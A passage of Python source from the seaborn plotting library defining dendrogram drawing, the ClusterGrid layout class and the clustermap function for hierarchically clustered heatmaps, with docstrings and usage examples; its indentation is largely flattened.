annot_kws, cbar, cbar_kws, xticklabels,
yticklabels, mask)
# Add the pcolormesh kwargs here
kwargs["linewidths"] = linewidths
kwargs["edgecolor"] = linecolor
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect("equal")
plotter.plot(ax, cbar_ax, kwargs)
return ax
class _DendrogramPlotter(object):
"""Object for drawing tree of similarities between data rows/columns"""
def __init__(self, data, linkage, metric, method, axis, label, rotate):
"""Plot a dendrogram of the relationships between the columns of data
Parameters
----------
data : pandas.DataFrame
Rectangular data
"""
self.axis = axis
if self.axis == 1:
data = data.T
if isinstance(data, pd.DataFrame):
array = data.values
else:
array = np.asarray(data)
data = pd.DataFrame(array)
self.array = array
self.data = data
self.shape = self.data.shape
self.metric = metric
self.method = method
self.axis = axis
self.label = label
self.rotate = rotate
if linkage is None:
self.linkage = self.calculated_linkage
else:
self.linkage = linkage
self.dendrogram = self.calculate_dendrogram()
# Dendrogram ends are always at multiples of 5, who knows why
ticks = 10 * np.arange(self.data.shape[0]) + 5
if self.label:
ticklabels = _index_to_ticklabels(self.data.index)
ticklabels = [ticklabels[i] for i in self.reordered_ind]
if self.rotate:
self.xticks = []
self.yticks = ticks
self.xticklabels = []
self.yticklabels = ticklabels
self.ylabel = _index_to_label(self.data.index)
self.xlabel = ''
else:
self.xticks = ticks
self.yticks = []
self.xticklabels = ticklabels
self.yticklabels = []
self.ylabel = ''
self.xlabel = _index_to_label(self.data.index)
else:
self.xticks, self.yticks = [], []
self.yticklabels, self.xticklabels = [], []
self.xlabel, self.ylabel = '', ''
self.dependent_coord = self.dendrogram['dcoord']
self.independent_coord = self.dendrogram['icoord']
def _calculate_linkage_scipy(self):
linkage = hierarchy.linkage(self.array, method=self.method,
metric=self.metric)
return linkage
def _calculate_linkage_fastcluster(self):
import fastcluster
# Fastcluster has a memory-saving vectorized version, but only
# with certain linkage methods, and mostly with euclidean metric
# vector_methods = ('single', 'centroid', 'median', 'ward')
euclidean_methods = ('centroid', 'median', 'ward')
euclidean = self.metric == 'euclidean' and self.method in \
euclidean_methods
if euclidean or self.method == 'single':
return fastcluster.linkage_vector(self.array,
method=self.method,
metric=self.metric)
else:
linkage = fastcluster.linkage(self.array, method=self.method,
metric=self.metric)
return linkage
@property
def calculated_linkage(self):
try:
return self._calculate_linkage_fastcluster()
except ImportError:
            if np.prod(self.shape) >= 10000:
msg = ("Clustering large matrix with scipy. Installing "
"`fastcluster` may give better performance.")
warnings.warn(msg)
return self._calculate_linkage_scipy()
def calculate_dendrogram(self):
"""Calculates a dendrogram based on the linkage matrix
        Made a separate function, not a property, because we don't want to
        recalculate the dendrogram every time it is accessed.
Returns
-------
dendrogram : dict
Dendrogram dictionary as returned by scipy.cluster.hierarchy
.dendrogram. The important key-value pairing is
"reordered_ind" which indicates the re-ordering of the matrix
"""
return hierarchy.dendrogram(self.linkage, no_plot=True,
color_threshold=-np.inf)
@property
def reordered_ind(self):
"""Indices of the matrix, reordered by the dendrogram"""
return self.dendrogram['leaves']
def plot(self, ax, tree_kws):
"""Plots a dendrogram of the similarities between data on the axes
Parameters
----------
ax : matplotlib.axes.Axes
Axes object upon which the dendrogram is plotted
"""
tree_kws = {} if tree_kws is None else tree_kws.copy()
tree_kws.setdefault("linewidths", .5)
tree_kws.setdefault("colors", ".2")
if self.rotate and self.axis == 0:
coords = zip(self.dependent_coord, self.independent_coord)
else:
coords = zip(self.independent_coord, self.dependent_coord)
lines = LineCollection([list(zip(x, y)) for x, y in coords],
**tree_kws)
ax.add_collection(lines)
number_of_leaves = len(self.reordered_ind)
max_dependent_coord = max(map(max, self.dependent_coord))
if self.rotate:
ax.yaxis.set_ticks_position('right')
# Constants 10 and 1.05 come from
# `scipy.cluster.hierarchy._plot_dendrogram`
ax.set_ylim(0, number_of_leaves * 10)
ax.set_xlim(0, max_dependent_coord * 1.05)
ax.invert_xaxis()
ax.invert_yaxis()
else:
# Constants 10 and 1.05 come from
# `scipy.cluster.hierarchy._plot_dendrogram`
ax.set_xlim(0, number_of_leaves * 10)
ax.set_ylim(0, max_dependent_coord * 1.05)
despine(ax=ax, bottom=True, left=True)
ax.set(xticks=self.xticks, yticks=self.yticks,
xlabel=self.xlabel, ylabel=self.ylabel)
xtl = ax.set_xticklabels(self.xticklabels)
ytl = ax.set_yticklabels(self.yticklabels, rotation='vertical')
# Force a draw of the plot to avoid matplotlib window error
if hasattr(ax.figure.canvas, "get_renderer"):
ax.figure.draw(ax.figure.canvas.get_renderer())
if len(ytl) > 0 and axis_ticklabels_overlap(ytl):
plt.setp(ytl, rotation="horizontal")
if len(xtl) > 0 and axis_ticklabels_overlap(xtl):
plt.setp(xtl, rotation="vertical")
return self
def dendrogram(data, linkage=None, axis=1, label=True, metric='euclidean',
method='average', rotate=False, tree_kws=None, ax=None):
"""Draw a tree diagram of relationships within a matrix
Parameters
----------
data : pandas.DataFrame
Rectangular data
linkage : numpy.array, optional
Linkage matrix
axis : int, optional
Which axis to use to calculate linkage. 0 is rows, 1 is columns.
label : bool, optional
If True, label the dendrogram at leaves with column or row names
metric : str, optional
Distance metric. Anything valid for scipy.spatial.distance.pdist
method : str, optional
Linkage method to use. Anything valid for
scipy.cluster.hierarchy.linkage
rotate : bool, optional
When plotting the matrix, whether to rotate it 90 degrees
counter-clockwise, so the leaves face right
tree_kws : dict, optional
Keyword arguments for the ``matplotlib.collections.LineCollection``
that is used for plotting the lines of the dendrogram tree.
ax : matplotlib axis, optional
Axis to plot on, otherwise uses current axis
Returns
-------
dendrogramplotter : _DendrogramPlotter
A Dendrogram plotter object.
Notes
-----
Access the reordered dendrogram indices with
dendrogramplotter.reordered_ind
"""
plotter = _DendrogramPlotter(data, linkage=linkage, axis=axis,
metric=metric, method=method,
label=label, rotate=rotate)
if ax is None:
ax = plt.gca()
return plotter.plot(ax=ax, tree_kws=tree_kws)
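# Minimal usage sketch (assumes a rectangular DataFrame `df` already exists):
#
#   dp = dendrogram(df, axis=0, rotate=True)
#   order = dp.reordered_ind        # row order implied by the clustering
#   df_clustered = df.iloc[order]   # reorder the data to match the tree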
class ClusterGrid(Grid):
def __init__(self, data, pivot_kws=None, z_score=None, standard_scale=None,
figsize=None, row_colors=None, col_colors=None, mask=None,
dendrogram_ratio=None, colors_ratio=None, cbar_pos=None):
"""Grid object for organizing clustered heatmap input on to axes"""
if isinstance(data, pd.DataFrame):
self.data = data
else:
self.data = pd.DataFrame(data)
self.data2d = self.format_data(self.data, pivot_kws, z_score,
standard_scale)
self.mask = _matrix_mask(self.data2d, mask)
self.fig = plt.figure(figsize=figsize)
self.row_colors, self.row_color_labels = \
self._preprocess_colors(data, row_colors, axis=0)
self.col_colors, self.col_color_labels = \
self._preprocess_colors(data, col_colors, axis=1)
try:
row_dendrogram_ratio, col_dendrogram_ratio = dendrogram_ratio
except TypeError:
row_dendrogram_ratio = col_dendrogram_ratio = dendrogram_ratio
try:
row_colors_ratio, col_colors_ratio = colors_ratio
except TypeError:
row_colors_ratio = col_colors_ratio = colors_ratio
width_ratios = self.dim_ratios(self.row_colors,
row_dendrogram_ratio,
row_colors_ratio)
height_ratios = self.dim_ratios(self.col_colors,
col_dendrogram_ratio,
col_colors_ratio)
nrows = 2 if self.col_colors is None else 3
ncols = 2 if self.row_colors is None else 3
self.gs = gridspec.GridSpec(nrows, ncols,
width_ratios=width_ratios,
height_ratios=height_ratios)
self.ax_row_dendrogram = self.fig.add_subplot(self.gs[-1, 0])
self.ax_col_dendrogram = self.fig.add_subplot(self.gs[0, -1])
self.ax_row_dendrogram.set_axis_off()
self.ax_col_dendrogram.set_axis_off()
self.ax_row_colors = None
self.ax_col_colors = None
if self.row_colors is not None:
self.ax_row_colors = self.fig.add_subplot(
self.gs[-1, 1])
if self.col_colors is not None:
self.ax_col_colors = self.fig.add_subplot(
self.gs[1, -1])
self.ax_heatmap = self.fig.add_subplot(self.gs[-1, -1])
if cbar_pos is None:
self.ax_cbar = self.cax = None
else:
# Initialize the colorbar axes in the gridspec so that tight_layout
# works. We will move it where it belongs later. This is a hack.
self.ax_cbar = self.fig.add_subplot(self.gs[0, 0])
            self.cax = self.ax_cbar  # Backwards compatibility
self.cbar_pos = cbar_pos
self.dendrogram_row = None
self.dendrogram_col = None
def _preprocess_colors(self, data, colors, axis):
"""Preprocess {row/col}_colors to extract labels and convert colors."""
labels = None
if colors is not None:
if isinstance(colors, (pd.DataFrame, pd.Series)):
# Ensure colors match data indices
if axis == 0:
colors = colors.reindex(data.index)
else:
colors = colors.reindex(data.columns)
# Replace na's with background color
# TODO We should set these to transparent instead
colors = colors.fillna('white')
# Extract color values and labels from frame/series
if isinstance(colors, pd.DataFrame):
labels = list(colors.columns)
colors = colors.T.values
else:
if colors.name is None:
labels = [""]
else:
labels = [colors.name]
colors = colors.values
colors = _convert_colors(colors)
return colors, labels
def format_data(self, data, pivot_kws, z_score=None,
standard_scale=None):
"""Extract variables from data or use directly."""
# Either the data is already in 2d matrix format, or need to do a pivot
if pivot_kws is not None:
data2d = data.pivot(**pivot_kws)
else:
data2d = data
if z_score is not None and standard_scale is not None:
raise ValueError(
'Cannot perform both z-scoring and standard-scaling on data')
if z_score is not None:
data2d = self.z_score(data2d, z_score)
if standard_scale is not None:
data2d = self.standard_scale(data2d, standard_scale)
return data2d
@staticmethod
def z_score(data2d, axis=1):
"""Standarize the mean and variance of the data axis
Parameters
----------
data2d : pandas.DataFrame
Data to normalize
axis : int
Which axis to normalize across. If 0, normalize across rows, if 1,
normalize across columns.
Returns
-------
normalized : pandas.DataFrame
            Normalized data with a mean of 0 and variance of 1 across the
specified axis.
"""
if axis == 1:
z_scored = data2d
else:
z_scored = data2d.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
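    # Tiny worked example (hypothetical values): with axis=1 each *column* is
    # normalized, since pandas' mean()/std() reduce over rows by default.
    #
    #   df = pd.DataFrame({"a": [0.0, 2.0]})
    #   ClusterGrid.z_score(df, axis=1)["a"].tolist()  # -> [-0.707..., 0.707...]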
@staticmethod
def standard_scale(data2d, axis=1):
"""Divide the data by the difference between the max and min
Parameters
----------
data2d : pandas.DataFrame
Data to normalize
axis : int
Which axis to normalize across. If 0, normalize across rows, if 1,
normalize across columns.
        Returns
        -------
        standardized : pandas.DataFrame
            Normalized data, rescaled to range from 0 to 1 across the
            specified axis.
"""
# Normalize these values to range from 0 to 1
if axis == 1:
standardized = data2d
else:
standardized = data2d.T
subtract = standardized.min()
standardized = (standardized - subtract) / (
standardized.max() - standardized.min())
if axis == 1:
return standardized
else:
return standardized.T
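    # Worked example (hypothetical values): standard_scale maps each column
    # onto the [0, 1] range when axis=1.
    #
    #   df = pd.DataFrame({"a": [2.0, 4.0, 6.0]})
    #   ClusterGrid.standard_scale(df, axis=1)["a"].tolist()  # -> [0.0, 0.5, 1.0]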
def dim_ratios(self, colors, dendrogram_ratio, colors_ratio):
"""Get the proportions of the figure taken up by each axes."""
ratios = [dendrogram_ratio]
if colors is not None:
            # Colors are encoded as rgb, so there is an extra dimension
if np.ndim(colors) > 2:
n_colors = len(colors)
else:
n_colors = 1
ratios += [n_colors * colors_ratio]
# Add the ratio for the heatmap itself
ratios.append(1 - sum(ratios))
return ratios
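    # Example (illustrative numbers): with a single level of row colors,
    # dim_ratios(colors, dendrogram_ratio=0.2, colors_ratio=0.03) returns
    # [0.2, 0.03, 0.77] -- dendrogram, color strip, then the heatmap remainder.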
@staticmethod
def color_list_to_matrix_and_cmap(colors, ind, axis=0):
"""Turns a list of colors into a numpy matrix and matplotlib colormap
These arguments can now be plotted using heatmap(matrix, cmap)
and the provided colors will be plotted.
Parameters
----------
colors : list of matplotlib colors
Colors to label the rows or columns of a dataframe.
ind : list of ints
Ordering of the rows or columns, to reorder the original colors
by the clustered dendrogram order
axis : int
Which axis this is labeling
Returns
-------
matrix : numpy.array
A numpy array of integer values, where each corresponds to a color
from the originally provided list of colors
cmap : matplotlib.colors.ListedColormap
"""
# check for nested lists/color palettes.
# Will fail if matplotlib color is list not tuple
if any(issubclass(type(x), list) for x in colors):
all_colors = set(itertools.chain(*colors))
n = len(colors)
m = len(colors[0])
else:
all_colors = set(colors)
n = 1
m = len(colors)
colors = [colors]
color_to_value = dict((col, i) for i, col in enumerate(all_colors))
matrix = np.array([color_to_value[c]
for color in colors for c in color])
shape = (n, m)
matrix = matrix.reshape(shape)
matrix = matrix[:, ind]
if axis == 0:
# row-side:
matrix = matrix.T
cmap = mpl.colors.ListedColormap(all_colors)
return matrix, cmap
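    # Illustration (hypothetical colors): a flat list of row colors reordered
    # by a dendrogram becomes an integer matrix plus a matching colormap.
    #
    #   colors = ["r", "g", "b"]       # one color per row
    #   ind = [2, 0, 1]                # leaf order from the dendrogram
    #   m, cmap = ClusterGrid.color_list_to_matrix_and_cmap(colors, ind, axis=0)
    #   # m has shape (3, 1): a single column of integer codes, reordered so
    #   # row 0 shows colors[2], row 1 shows colors[0], and row 2 shows colors[1].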
def savefig(self, *args, **kwargs):
if 'bbox_inches' not in kwargs:
kwargs['bbox_inches'] = 'tight'
self.fig.savefig(*args, **kwargs)
def plot_dendrograms(self, row_cluster, col_cluster, metric, method,
row_linkage, col_linkage, tree_kws):
# Plot the row dendrogram
if row_cluster:
self.dendrogram_row = dendrogram(
self.data2d, metric=metric, method=method, label=False, axis=0,
ax=self.ax_row_dendrogram, rotate=True, linkage=row_linkage,
tree_kws=tree_kws
)
else:
self.ax_row_dendrogram.set_xticks([])
self.ax_row_dendrogram.set_yticks([])
        # Plot the column dendrogram
if col_cluster:
self.dendrogram_col = dendrogram(
self.data2d, metric=metric, method=method, label=False,
axis=1, ax=self.ax_col_dendrogram, linkage=col_linkage,
tree_kws=tree_kws
)
else:
self.ax_col_dendrogram.set_xticks([])
self.ax_col_dendrogram.set_yticks([])
despine(ax=self.ax_row_dendrogram, bottom=True, left=True)
despine(ax=self.ax_col_dendrogram, bottom=True, left=True)
def plot_colors(self, xind, yind, **kws):
"""Plots color labels between the dendrogram and the heatmap
Parameters
----------
heatmap_kws : dict
Keyword arguments heatmap
"""
# Remove any custom colormap and centering
# TODO this code has consistently caused problems when we
# have missed kwargs that need to be excluded that it might
# be better to rewrite *in*clusively.
kws = kws.copy()
kws.pop('cmap', None)
kws.pop('norm', None)
kws.pop('center', None)
kws.pop('annot', None)
kws.pop('vmin', None)
kws.pop('vmax', None)
kws.pop('robust', None)
kws.pop('xticklabels', None)
kws.pop('yticklabels', None)
# Plot the row colors
if self.row_colors is not None:
matrix, cmap = self.color_list_to_matrix_and_cmap(
self.row_colors, yind, axis=0)
# Get row_color labels
if self.row_color_labels is not None:
row_color_labels = self.row_color_labels
else:
row_color_labels = False
heatmap(matrix, cmap=cmap, cbar=False, ax=self.ax_row_colors,
xticklabels=row_color_labels, yticklabels=False, **kws)
# Adjust rotation of labels
if row_color_labels is not False:
plt.setp(self.ax_row_colors.get_xticklabels(), rotation=90)
else:
despine(self.ax_row_colors, left=True, bottom=True)
# Plot the column colors
if self.col_colors is not None:
matrix, cmap = self.color_list_to_matrix_and_cmap(
self.col_colors, xind, axis=1)
# Get col_color labels
if self.col_color_labels is not None:
col_color_labels = self.col_color_labels
else:
col_color_labels = False
heatmap(matrix, cmap=cmap, cbar=False, ax=self.ax_col_colors,
xticklabels=False, yticklabels=col_color_labels, **kws)
# Adjust rotation of labels, place on right side
if col_color_labels is not False:
self.ax_col_colors.yaxis.tick_right()
plt.setp(self.ax_col_colors.get_yticklabels(), rotation=0)
else:
despine(self.ax_col_colors, left=True, bottom=True)
def plot_matrix(self, colorbar_kws, xind, yind, **kws):
self.data2d = self.data2d.iloc[yind, xind]
self.mask = self.mask.iloc[yind, xind]
# Try to reorganize specified tick labels, if provided
xtl = kws.pop("xticklabels", "auto")
try:
xtl = np.asarray(xtl)[xind]
except (TypeError, IndexError):
pass
ytl = kws.pop("yticklabels", "auto")
try:
ytl = np.asarray(ytl)[yind]
except (TypeError, IndexError):
pass
# Reorganize the annotations to match the heatmap
annot = kws.pop("annot", None)
if annot is None:
pass
else:
if isinstance(annot, bool):
annot_data = self.data2d
else:
annot_data = np.asarray(annot)
if annot_data.shape != self.data2d.shape:
err = "`data` and `annot` must have same shape."
raise ValueError(err)
annot_data = annot_data[yind][:, xind]
annot = annot_data
# Setting ax_cbar=None in clustermap call implies no colorbar
kws.setdefault("cbar", self.ax_cbar is not None)
heatmap(self.data2d, ax=self.ax_heatmap, cbar_ax=self.ax_cbar,
cbar_kws=colorbar_kws, mask=self.mask,
xticklabels=xtl, yticklabels=ytl, annot=annot, **kws)
ytl = self.ax_heatmap.get_yticklabels()
ytl_rot = None if not ytl else ytl[0].get_rotation()
self.ax_heatmap.yaxis.set_ticks_position('right')
self.ax_heatmap.yaxis.set_label_position('right')
if ytl_rot is not None:
ytl = self.ax_heatmap.get_yticklabels()
plt.setp(ytl, rotation=ytl_rot)
tight_params = dict(h_pad=.02, w_pad=.02)
if self.ax_cbar is None:
self.fig.tight_layout(**tight_params)
else:
# Turn the colorbar axes off for tight layout so that its
# ticks don't interfere with the rest of the plot layout.
# Then move it.
self.ax_cbar.set_axis_off()
self.fig.tight_layout(**tight_params)
self.ax_cbar.set_axis_on()
self.ax_cbar.set_position(self.cbar_pos)
def plot(self, metric, method, colorbar_kws, row_cluster, col_cluster,
row_linkage, col_linkage, tree_kws, **kws):
# heatmap square=True sets the aspect ratio on the axes, but that is
# not compatible with the multi-axes layout of clustergrid
if kws.get("square", False):
msg = "``square=True`` ignored in clustermap"
warnings.warn(msg)
kws.pop("square")
colorbar_kws = {} if colorbar_kws is None else colorbar_kws
self.plot_dendrograms(row_cluster, col_cluster, metric, method,
row_linkage=row_linkage, col_linkage=col_linkage,
tree_kws=tree_kws)
try:
xind = self.dendrogram_col.reordered_ind
except AttributeError:
xind = np.arange(self.data2d.shape[1])
try:
yind = self.dendrogram_row.reordered_ind
except AttributeError:
yind = np.arange(self.data2d.shape[0])
self.plot_colors(xind, yind, **kws)
self.plot_matrix(colorbar_kws, xind, yind, **kws)
return self
def clustermap(data, pivot_kws=None, method='average', metric='euclidean',
z_score=None, standard_scale=None, figsize=(10, 10),
cbar_kws=None, row_cluster=True, col_cluster=True,
row_linkage=None, col_linkage=None,
row_colors=None, col_colors=None, mask=None,
dendrogram_ratio=.2, colors_ratio=0.03,
cbar_pos=(.02, .8, .05, .18), tree_kws=None,
**kwargs):
"""Plot a matrix dataset as a hierarchically-clustered heatmap.
Parameters
----------
data: 2D array-like
Rectangular data for clustering. Cannot contain NAs.
pivot_kws : dict, optional
If `data` is a tidy dataframe, can provide keyword arguments for
pivot to create a rectangular dataframe.
method : str, optional
Linkage method to use for calculating clusters.
See scipy.cluster.hierarchy.linkage documentation for more information:
https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
metric : str, optional
Distance metric to use for the data. See
scipy.spatial.distance.pdist documentation for more options
https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.pdist.html
To use different metrics (or methods) for rows and columns, you may
construct each linkage matrix yourself and provide them as
{row,col}_linkage.
z_score : int or None, optional
Either 0 (rows) or 1 (columns). Whether or not to calculate z-scores
for the rows or the columns. Z scores are: z = (x - mean)/std, so
values in each row (column) will get the mean of the row (column)
subtracted, then divided by the standard deviation of the row (column).
This ensures that each row (column) has mean of 0 and variance of 1.
standard_scale : int or None, optional
Either 0 (rows) or 1 (columns). Whether or not to standardize that
dimension, meaning for each row or column, subtract the minimum and
divide each by its maximum.
figsize: (width, height), optional
Overall size of the figure.
cbar_kws : dict, optional
Keyword arguments to pass to ``cbar_kws`` in ``heatmap``, e.g. to
add a label to the colorbar.
{row,col}_cluster : bool, optional
If True, cluster the {rows, columns}.
{row,col}_linkage : numpy.array, optional
Precomputed linkage matrix for the rows or columns. See
scipy.cluster.hierarchy.linkage for specific formats.
{row,col}_colors : list-like or pandas DataFrame/Series, optional
List of colors to label for either the rows or columns. Useful to
evaluate whether samples within a group are clustered together. Can
use nested lists or DataFrame for multiple color levels of labeling.
If given as a DataFrame or Series, labels for the colors are extracted
from the DataFrames column names or from the name of the Series.
DataFrame/Series colors are also matched to the data by their
index, ensuring colors are drawn in the correct order.
mask : boolean array or DataFrame, optional
If passed, data will not be shown in cells where ``mask`` is True.
Cells with missing values are automatically masked. Only used for
visualizing, not for calculating.
{dendrogram,colors}_ratio: float, or pair of floats, optional
Proportion of the figure size devoted to the two marginal elements. If
a pair is given, they correspond to (row, col) ratios.
cbar_pos : (left, bottom, width, height), optional
Position of the colorbar axes in the figure. Setting to ``None`` will
disable the colorbar.
tree_kws : dict, optional
Parameters for the :class:`matplotlib.collections.LineCollection`
that is used to plot the lines of the dendrogram tree.
kwargs : other keyword arguments
All other keyword arguments are passed to :func:`heatmap`
Returns
-------
clustergrid : ClusterGrid
A ClusterGrid instance.
Notes
-----
The returned object has a ``savefig`` method that should be used if you
want to save the figure object without clipping the dendrograms.
To access the reordered row indices, use:
``clustergrid.dendrogram_row.reordered_ind``
Column indices, use:
``clustergrid.dendrogram_col.reordered_ind``
Examples
--------
Plot a clustered heatmap:
.. plot::
:context: close-figs
>>> import seaborn as sns; sns.set(color_codes=True)
>>> iris = sns.load_dataset("iris")
>>> species = iris.pop("species")
>>> g = sns.clustermap(iris)
Change the size and layout of the figure:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris,
... figsize=(7, 5),
... row_cluster=False,
... dendrogram_ratio=(.1, .2),
... cbar_pos=(0, .2, .03, .4))
Add colored labels to identify observations:
.. plot::
:context: close-figs
>>> lut = dict(zip(species.unique(), "rbg"))
>>> row_colors = species.map(lut)
>>> g = sns.clustermap(iris, row_colors=row_colors)
Use a different colormap and adjust the limits of the color range:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, cmap="mako", vmin=0, vmax=10)
Use a different similarity metric:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, metric="correlation")
Use a different clustering method:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, method="single")
Standardize the data within the columns:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, standard_scale=1)
Normalize the data within the rows:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, z_score=0, cmap="vlag")
"""
plotter = ClusterGrid(data, pivot_kws=pivot_kws, figsize=figsize,
row_colors=row_colors, col_colors=col_colors,
z_score=z_score, standard_scale=standard_scale,
mask=mask, dendrogram_ratio=dendrogram_ratio,
colors_ratio=colors_ratio, cbar_pos=cbar_pos)
return plotter.plot(metric=metric, method=method,
colorbar_kws=cbar_kws,
row_cluster=row_cluster, col_cluster=col_cluster,
row_linkage=row_linkage, col_linkage=col_linkage,
tree_kws=tree_kws, **kwargs)